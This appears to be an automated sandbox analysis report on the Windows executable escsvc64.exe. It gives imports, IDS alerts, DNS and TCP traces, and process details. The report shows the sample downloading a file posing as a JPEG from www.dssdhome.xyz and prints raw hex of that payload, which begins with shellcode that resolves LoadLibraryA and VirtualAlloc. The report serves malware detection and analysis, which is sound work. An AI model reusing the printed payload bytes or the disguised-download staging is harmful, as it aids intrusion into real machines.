RT_ICON	0x1c4f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x1eaa0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x1fb48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_ICON	0x1ffb0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x20298	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x203c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x21268	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x21b10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x22078	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x24620	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x256c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_GROUP_ICON	0x25b30	0x76	data	English	United States	0.6440677966101694
RT_GROUP_ICON	0x25ba8	0x76	data	English	United States	0.6610169491525424
RT_VERSION	0x25c20	0x2f8	data	English	United States	0.4631578947368421
RT_MANIFEST	0x25f18	0x475	ASCII text, with CRLF line terminators	English	United States	0.4539877300613497

Imports

DLL	Import
KERNEL32.dll	CreateFileA, lstrcmpW, WaitForSingleObject, OpenProcess, lstrcmpiW, lstrcpynW, Sleep, GetTickCount, GetModuleFileNameW, CloseHandle, WaitForMultipleObjects, CreateEventW, SetEvent, GetLastError, LocalFree, GetCommandLineW, lstrlenW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, HeapReAlloc, InitializeCriticalSection, LoadLibraryA, SetEnvironmentVariableW, SetEnvironmentVariableA, CompareStringW, CompareStringA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlCaptureContext, RtlVirtualUnwind, RtlLookupFunctionEntry, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, GetProcAddress, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, MultiByteToWideChar, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, ExitProcess, RtlUnwindEx, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, WriteFile, GetStdHandle, GetModuleFileNameA, GetCommandLineA, SetHandleCount, GetFileType, GetStartupInfoA, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers
USER32.dll	UnregisterDeviceNotification, RegisterDeviceNotificationW
ADVAPI32.dll	StartServiceCtrlDispatcherW, RegQueryValueExW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, DeleteService, QueryServiceStatus, ControlService, QueryServiceStatusEx, StartServiceW, OpenServiceW, CloseServiceHandle, CreateServiceW, OpenSCManagerW, SetServiceStatus, RegisterServiceCtrlHandlerExW
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW
ole32.dll	CoCreateInstance, FreePropVariantArray, CoInitialize, CoUninitialize
OLEAUT32.dll	SysFreeString, SysAllocString
PSAPI.DLL	EnumProcesses, EnumProcessModules, GetModuleBaseNameW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T11:26:06.831941+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49702	212.102.46.118	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:26:06.141452074 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:06.141472101 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:06.141561031 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:06.143237114 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:06.143250942 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:06.831784964 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:06.831940889 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:06.878938913 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:06.878957987 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:06.879364014 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:06.919945955 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.136190891 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.183334112 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.301429987 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.321876049 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.321888924 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.321902037 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.322048903 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.322081089 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.322150946 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.393416882 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.393433094 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.393480062 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.393769979 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.393807888 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.393944979 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.415802002 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.415826082 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.416110039 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.416126013 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.416166067 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.475651979 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.475681067 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.475927114 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.475960016 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.476000071 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.480179071 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.480195999 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.480361938 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.480389118 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.480442047 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.485513926 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.485533953 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.485600948 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.485609055 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.485647917 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.502468109 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.502489090 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.502659082 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.502659082 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.502675056 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.502722025 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.561743021 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.561783075 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.561822891 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:07.561948061 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.561948061 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.581907034 CET	49702	443	192.168.2.7	212.102.46.118
Jan 14, 2025 11:26:07.581935883 CET	443	49702	212.102.46.118	192.168.2.7
Jan 14, 2025 11:26:38.662008047 CET	49497	53	192.168.2.7	162.159.36.2
Jan 14, 2025 11:26:38.666851997 CET	53	49497	162.159.36.2	192.168.2.7
Jan 14, 2025 11:26:38.666924953 CET	49497	53	192.168.2.7	162.159.36.2
Jan 14, 2025 11:26:38.671828032 CET	53	49497	162.159.36.2	192.168.2.7
Jan 14, 2025 11:26:39.117876053 CET	49497	53	192.168.2.7	162.159.36.2
Jan 14, 2025 11:26:39.122817993 CET	53	49497	162.159.36.2	192.168.2.7
Jan 14, 2025 11:26:39.122879028 CET	49497	53	192.168.2.7	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:26:05.781852961 CET	50415	53	192.168.2.7	1.1.1.1
Jan 14, 2025 11:26:06.135070086 CET	53	50415	1.1.1.1	192.168.2.7
Jan 14, 2025 11:26:38.661484957 CET	53	50481	162.159.36.2	192.168.2.7
Jan 14, 2025 11:26:39.133147001 CET	56360	53	192.168.2.7	1.1.1.1
Jan 14, 2025 11:26:39.140537977 CET	53	56360	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 11:26:05.781852961 CET	192.168.2.7	1.1.1.1	0xad59	Standard query (0)	www.dssdhome.xyz	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:26:39.133147001 CET	192.168.2.7	1.1.1.1	0xf9b9	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 11:26:06.135070086 CET	1.1.1.1	192.168.2.7	0xad59	No error (0)	www.dssdhome.xyz	mooscc.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 11:26:06.135070086 CET	1.1.1.1	192.168.2.7	0xad59	No error (0)	mooscc.b-cdn.net		212.102.46.118	A (IP address)	IN (0x0001)	false
Jan 14, 2025 11:26:39.140537977 CET	1.1.1.1	192.168.2.7	0xf9b9	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dssdhome.xyz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	212.102.46.118	443	4692	C:\Users\user\Desktop\escsvc64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:26:07 UTC	159	OUT	GET /11/xin/escsvc64.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2 Host: www.dssdhome.xyz
2025-01-14 10:26:07 UTC	964	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:26:07 GMT Content-Type: image/jpeg Content-Length: 125740 Connection: close Server: BunnyCDN-WA1-1120 CDN-PullZone: 2373567 CDN-Uid: 95780366-96cb-4089-af63-a08b2db1368d CDN-RequestCountryCode: US Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Cache-Control: max-age=25600000 Last-Modified: Mon, 06 Jan 2025 13:18:02 GMT CDN-StorageServer: LA-457 CDN-FileServer: 777 CDN-ProxyVer: 1.07 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 01/11/2025 19:48:12 CDN-EdgeStorageId: 1120 CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: ab7e1797de4cf85145b912d430925961 CDN-Cache: HIT Accept-Ranges: bytes
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: e8 00 00 00 00 59 49 89 c8 48 81 c1 23 0b 00 00 ba f6 f2 24 c7 49 81 c0 23 eb 01 00 41 b9 04 00 00 00 56 48 89 e6 48 83 e4 f0 48 83 ec 30 c7 44 24 20 05 00 00 00 e8 05 00 00 00 48 89 f4 5e c3 48 8b c4 48 89 58 08 44 89 48 20 4c 89 40 18 89 50 10 55 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 90 48 81 ec 70 01 00 00 45 33 ff c7 45 d8 6b 00 65 00 48 8b f1 4c 89 7d f8 b9 13 9c bf bd 4c 89 7d c8 4c 89 7d 08 45 8d 4f 65 4c 89 7d 10 44 88 4d bc 44 88 4d a2 4c 89 7d 00 4c 89 7d f0 4c 89 7d 18 44 89 7d 24 44 89 7c 24 2c c7 45 dc 72 00 6e 00 c7 45 e0 65 00 6c 00 c7 45 e4 33 00 32 00 c7 45 e8 2e 00 64 00 c7 45 ec 6c 00 6c 00 c7 44 24 40 53 6c 65 65 c6 44 24 44 70 c7 44 24 58 4c 6f 61 64 c7 44 24 5c 4c 69 62 72 c7 44 24 60 61 72 79 41 c7 44 24 48 56 69 72 74 c7 44 24 Data Ascii: YIH#$I#AVHHH0D$ H^HHXDH L@PUVWATAUAVAWHl$HpE3EkeHL}L}L}EOeL}DMDML}L}L}D}$D\|$,ErnEelE32E.dEllD$@SleeD$DpD$XLoadD$\LibrD$`aryAD$HVirtD$
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: ff ff ff 48 8b de 48 8b f0 eb 0d 8b 0d 87 8f 01 00 33 d2 e8 14 35 00 00 48 8b cb e8 68 3f 00 00 8b cf ff 15 c0 e0 00 00 48 8b c6 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc 48 83 ec 28 48 8d 0d b1 fe ff ff e8 08 34 00 00 89 05 46 8f 01 00 83 f8 ff 74 25 48 8d 15 2a a0 01 00 8b c8 e8 c7 34 00 00 85 c0 74 0e c7 05 8d a0 01 00 fe ff ff ff b0 01 eb 07 e8 08 00 00 00 32 c0 48 83 c4 28 c3 cc 48 83 ec 28 8b 0d 0a 8f 01 00 83 f9 ff 74 0c e8 04 34 00 00 83 0d f9 8e 01 00 ff b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 4d 63 48 1c 4d 8b d0 48 8b 01 41 8b 04 01 83 f8 fe 75 0b 4c 8b 02 49 8b ca e8 8a 00 00 00 48 83 c4 28 c3 cc 40 53 48 83 ec 20 4c 8d 4c 24 40 49 8b d8 e8 e5 ee ff ff 48 8b 08 48 63 43 1c 48 89 4c 24 40 8b 44 08 04 48 83 c4 20 5b c3 cc cc cc 48 63 52 Data Ascii: HH35Hh?HH\$0Ht$8H _H(H4Ft%H*4t2H(H(t4H(H(McHMHAuLIH(@SH LL$@IHHcCHL$@DH [HcR
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: 20 5f c3 48 85 c0 74 e4 4c 8b 40 08 4d 85 c0 74 db 49 83 f8 05 75 0a 4c 89 48 08 41 8d 40 fc eb cd 49 83 f8 01 75 05 83 c8 ff eb c2 48 8b 6b 08 48 89 73 08 83 78 04 08 0f 85 b9 00 00 00 48 83 c1 30 48 8d 91 90 00 00 00 eb 08 4c 89 49 08 48 83 c1 10 48 3b ca 75 f3 81 38 8d 00 00 c0 8b 7b 10 74 7a 81 38 8e 00 00 c0 74 6b 81 38 8f 00 00 c0 74 5c 81 38 90 00 00 c0 74 4d 81 38 91 00 00 c0 74 3e 81 38 92 00 00 c0 74 2f 81 38 93 00 00 c0 74 20 81 38 b4 02 00 c0 74 11 81 38 b5 02 00 c0 8b d7 75 40 ba 8d 00 00 00 eb 36 ba 8e 00 00 00 eb 2f ba 85 00 00 00 eb 28 ba 8a 00 00 00 eb 21 ba 84 00 00 00 eb 1a ba 81 00 00 00 eb 13 ba 86 00 00 00 eb 0c ba 83 00 00 00 eb 05 ba 82 00 00 00 89 53 10 b9 08 00 00 00 49 8b c0 e8 f6 82 00 00 89 7b 10 eb 0f 8b 48 04 4c 89 48 08 49 Data Ascii: _HtL@MtIuLHA@IuHkHsxH0HLIHH;u8{tz8tk8t\8tM8t>8t/8t 8t8u@6/(!SI{HLHI
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: d9 45 33 ff 44 21 7c 24 78 41 b6 01 44 88 74 24 70 8b d1 83 ea 02 74 27 83 ea 02 74 52 83 ea 02 74 1d 83 ea 02 74 48 83 ea 03 74 43 83 ea 04 74 0e 83 ea 06 74 09 83 fa 01 0f 85 82 00 00 00 83 e9 02 0f 84 b4 00 00 00 83 e9 04 0f 84 90 00 00 00 83 e9 09 0f 84 99 00 00 00 83 e9 06 0f 84 87 00 00 00 83 f9 01 74 79 33 ff e9 94 00 00 00 e8 10 d3 ff ff 4c 8b f8 48 85 c0 75 1d 83 c8 ff 4c 8d 5c 24 40 49 8b 5b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 48 8b 00 48 8b 0d e5 74 00 00 48 c1 e1 04 48 03 c8 eb 09 39 58 04 74 0b 48 83 c0 10 48 3b c1 75 f2 33 c0 48 85 c0 75 12 e8 fa d6 ff ff c7 00 16 00 00 00 e8 33 ba ff ff eb a9 48 8d 78 08 45 32 f6 44 88 74 24 70 eb 22 48 8d 3d 28 2a 01 00 eb 19 48 8d 3d 17 2a 01 00 eb 10 48 8d 3d 1e 2a 01 00 eb 07 48 8d 3d Data Ascii: E3D!\|$xADt$pt'tRttHtCttty3LHuL\$@I[@IsHIA_A^A]A\_HHtHH9XtHH;u3Hu3HxE2Dt$p"H=(H=H=*H=
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: 64 eb 00 00 48 83 c4 10 5b c3 cc cc 48 83 ec 28 4d 8b 41 38 48 8b ca 49 8b d1 e8 0d 00 00 00 b8 01 00 00 00 48 83 c4 28 c3 cc cc cc 40 53 45 8b 18 48 8b da 41 83 e3 f8 4c 8b c9 41 f6 00 04 4c 8b d1 74 13 41 8b 40 08 4d 63 50 04 f7 d8 4c 03 d1 48 63 c8 4c 23 d1 49 63 c3 4a 8b 14 10 48 8b 43 10 8b 48 08 48 8b 43 08 f6 44 01 03 0f 74 0b 0f b6 44 01 03 83 e0 f0 4c 03 c8 4c 33 ca 49 8b c9 5b e9 e1 1d ff ff cc 4c 63 41 3c 45 33 c9 4c 03 c1 4c 8b d2 41 0f b7 40 14 45 0f b7 58 06 48 83 c0 18 49 03 c0 45 85 db 74 1e 8b 50 0c 4c 3b d2 72 0a 8b 48 08 03 ca 4c 3b d1 72 0e 41 ff c1 48 83 c0 28 45 3b cb 72 e2 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b d9 48 8d 3d 3c fe fe ff 48 8b cf e8 34 00 00 00 85 c0 74 22 48 2b df 48 8b d3 48 Data Ascii: dH[H(MA8HIH(@SEHALALtA@McPLHcL#IcJHCHHCDtDLL3I[LcA<E3LLA@EXHIEtPL;rHL;rAH(E;r3H\$WH HH=<H4t"H+HH
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: 40 4b 01 80 01 00 00 00 90 4b 01 80 01 00 00 00 b0 34 01 80 01 00 00 00 d0 4b 01 80 01 00 00 00 10 4c 01 80 01 00 00 00 50 4c 01 80 01 00 00 00 90 4c 01 80 01 00 00 00 e0 4c 01 80 01 00 00 00 40 4d 01 80 01 00 00 00 90 4d 01 80 01 00 00 00 e0 4d 01 80 01 00 00 00 f0 34 01 80 01 00 00 00 f8 4d 01 80 01 00 00 00 10 4e 01 80 01 00 00 00 20 4e 01 80 01 00 00 00 68 4e 01 80 01 00 00 00 00 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 64 00 61 00 74 00 65 00 74 00 69 00 6d 00 65 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d Data Ascii: @KK4KLPLLL@MMM4MN NhNapi-ms-win-core-datetime-l1-1-1api-ms-win-core-fibers-l1-1-
2025-01-14 10:26:07 UTC	16384	IN	Data Raw: 00 00 00 d0 0c 65 c6 3f 00 00 00 80 28 8a c6 3f 00 00 00 80 2b af c6 3f 00 00 00 e0 15 d4 c6 3f 00 00 00 d0 e7 f8 c6 3f 00 00 00 70 a1 1d c7 3f 00 00 00 e0 42 42 c7 3f 00 00 00 40 cc 66 c7 3f 00 00 00 a0 3d 8b c7 3f 00 00 00 30 97 af c7 3f 00 00 00 10 d9 d3 c7 3f 00 00 00 50 03 f8 c7 3f 00 00 00 20 16 1c c8 3f 00 00 00 90 11 40 c8 3f 00 00 00 c0 f5 63 c8 3f 00 00 00 e0 c2 87 c8 3f 00 00 00 00 79 ab c8 3f 00 00 00 30 18 cf c8 3f 00 00 00 a0 a0 f2 c8 3f 00 00 00 70 12 16 c9 3f 00 00 00 b0 6d 39 c9 3f 00 00 00 80 b2 5c c9 3f 00 00 00 00 e1 7f c9 3f 00 00 00 50 f9 a2 c9 3f 00 00 00 70 fb c5 c9 3f 00 00 00 b0 e7 e8 c9 3f 00 00 00 f0 bd 0b ca 3f 00 00 00 80 7e 2e ca 3f 00 00 00 60 29 51 ca 3f 00 00 00 a0 be 73 ca 3f 00 00 00 70 3e 96 ca 3f 00 00 00 f0 a8 b8 ca Data Ascii: e?(?+???p?BB?@f?=?0??P? ?@?c??y?0??p?m9?\??P?p???~.?`)Q?s?p>?
2025-01-14 10:26:07 UTC	11052	IN	Data Raw: 4d 61 70 53 74 72 69 6e 67 57 00 00 de 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 fd 02 47 65 74 53 74 64 48 61 6e 64 6c 65 00 00 74 02 47 65 74 46 69 6c 65 54 79 70 65 00 02 03 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 7f 03 48 65 61 70 53 69 7a 65 00 00 7d 03 48 65 61 70 52 65 41 6c 6c 6f 63 00 8b 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 c2 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 23 02 47 65 74 43 6f 6e 73 6f 6c 65 4f 75 74 70 75 74 43 50 00 00 1f 02 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 61 05 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 45 78 00 00 57 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MapStringWGetProcessHeapGetStdHandletGetFileTypeGetStringTypeWHeapSize}HeapReAllocSetStdHandleFlushFileBuffers#GetConsoleOutputCPGetConsoleModeaSetFilePointerExWWriteConsoleW

Target ID:	0
Start time:	05:26:05
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\escsvc64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\escsvc64.exe"
Imagebase:	0x140000000
File size:	144'560 bytes
MD5 hash:	525EA9523A2AFE76D2EAEBC4A6B923EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:26:07
Start date:	14/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4692 -s 1416
Imagebase:	0x7ff79e3d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	22.9%
Total number of Nodes:	398
Total number of Limit Nodes:	5

Executed Functions

Function 01FD0040 Relevance: 55.3, APIs: 6, Strings: 25, Instructions: 1047memorylibraryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE ref: 01FD0377
VirtualAlloc.KERNELBASE ref: 01FD03C0
LoadLibraryA.KERNELBASE ref: 01FD0648
SleepEx.KERNELBASE ref: 01FD06DB
VirtualProtect.KERNELBASE ref: 01FD08BB
RtlAddFunctionTable.KERNEL32 ref: 01FD0941

Strings

ncti, xrefs: 01FD0184
ualP, xrefs: 01FD0114
Flus, xrefs: 01FD012B
onTa, xrefs: 01FD018B
truc, xrefs: 01FD0139
lloc, xrefs: 01FD0104
Cach, xrefs: 01FD0147
ddFu, xrefs: 01FD017D
ct, xrefs: 01FD0124
ativ, xrefs: 01FD0156
Virt, xrefs: 01FD00F4
Slee, xrefs: 01FD00CF
eSys, xrefs: 01FD015E
rote, xrefs: 01FD011C
hIns, xrefs: 01FD0132
temI, xrefs: 01FD0165
GetN, xrefs: 01FD014E
ualA, xrefs: 01FD00FC
aryA, xrefs: 01FD00EC
RtlA, xrefs: 01FD0176
Libr, xrefs: 01FD00E4
Load, xrefs: 01FD00DC
tion, xrefs: 01FD0140
Virt, xrefs: 01FD010C
p, xrefs: 01FD00D7

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoLibraryLoadNativeProtectSleepSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$onTa$p$rote$temI$tion$truc$ualA$ualP
API String ID: 1082286156-924545899
Opcode ID: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
Instruction ID: f9ed0dffbdaa87478aef5138c55f4828ec5c981ef947fa3e0d991bd8ecded395
Opcode Fuzzy Hash: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
Instruction Fuzzy Hash: 6E620871A18B09CBDB19DF18D8856B9B7E2FB94301F58422DE88BC7251DF35E442CB86

Function 00000001400032A0 Relevance: 12.2, APIs: 8, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00000001400032BB
GetProcessHeap.KERNEL32 ref: 00000001400032C2
HeapAlloc.KERNEL32 ref: 00000001400032D3
GetVersionExA.KERNEL32 ref: 0000000140003316
GetProcessHeap.KERNEL32 ref: 0000000140003320
HeapFree.KERNEL32 ref: 000000014000332E
GetProcessHeap.KERNEL32 ref: 0000000140003352
HeapFree.KERNEL32 ref: 0000000140003360

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
Instruction ID: ff0c295640f5b83f1606a13dac472acdbcc50a6aea1cbc63b0c003526a08d6e8
Opcode Fuzzy Hash: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
Instruction Fuzzy Hash: 1C717AB1A0064186F7A7EB73B8517EA2299BB8C7C4F044039FB458B2F2EF798941C741

Function 0000000140007450 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133
memoryCOMMON

